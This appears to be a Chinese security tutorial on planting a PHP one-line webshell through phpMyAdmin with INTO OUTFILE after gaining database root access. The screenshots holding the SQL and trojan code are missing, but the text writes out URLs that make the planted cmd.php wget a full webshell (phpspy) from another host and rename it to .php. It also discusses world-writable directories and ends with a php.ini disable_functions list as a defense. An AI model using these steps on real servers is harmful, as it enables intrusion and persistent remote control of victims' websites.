利用 phpmyadmin 生成一句话木马及防范

beyes

现在假设我们已经通过注入漏洞获取了数据库的 root 权限，那么接下来可以尝试找到 phpmyadmin ，并利用它来生成一句话木马。下面演示这种情况：

1. 登录 phpmyadmin ，并在其中的某个数据库中建立一张表：



然后定义字段及其属性：



2. 建表完成后，在刚才新建的 cmd 字段里插入一句话木马，执行下面的 SQL 语句：






3. 接下来，使用 into outfile 将这句话导出到文件中：



注意，上图中 /home/wwwroot/groad/ 是网站的绝对路径。这里可以在该目录下生成了 cmd.php 是因为 groad 这个目录的 other 组具有可写的权限，尽管该目录的用户可能是 root ，如：


实际上，这个可写权限是为了模拟一些“可以写”的情况而自行添加上去的。由于从 phpmyadmin 里导出的 cmd.php 的用户是 “mysql” （在 linux 里安装 mysql 时创建的账户），而 groad 这个目录的所有者是 "www" ，若不是 www 的 other 具有可写权限，这个一句话木马也写不进来。从这里也可以看到，网站目录的所有者和数据库的所有者不是同一个人增加了安全性 --- 一般都是这种情况。然而，真正薄弱的地方，是一些站长贪图安逸，往往干脆将整个网站目录设置为 777 ，这下就权限大开了，从而一句话木马也顺利生成。

下面让我们来测试一下这个 cmd.php 是否有效：


由上图可以看到，命令执行成功了。从页面上看到的结果比较拥挤凌乱，我们可以查看网页源代码的方式，这样会一行一个结果，比较清楚。

到了这里，可以利用 wget 命令来从远端主机下载一个大型的网马丢在里面，比如如下提交 URL：

[Plain Text] 纯文本查看 复制代码

http://192.168.1.107/cmd.php?cmd=wget%20http://192.168.1.109/phpspy.txt

这个 phpspy.txt 就是大马，之所以先将它的后缀改为 .txt 是因为服务器一般是不会给你直接下载 php，asp 这样的服务端执行脚本的。下载完后，我们再利用 mv 命令将其改名即可：

[Plain Text] 纯文本查看 复制代码

http://192.168.1.107/cmd.php?cmd=mv%20phpspy.txt%20phpspy.php

有些时候，我们会遇到执行一句话木马没反应的情况。这时往往是有经验的管理员在 php.ini 中屏蔽了若干的危险函数，比如：

disable_functions = passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s
ymlink,popepassthru,stream_socket_server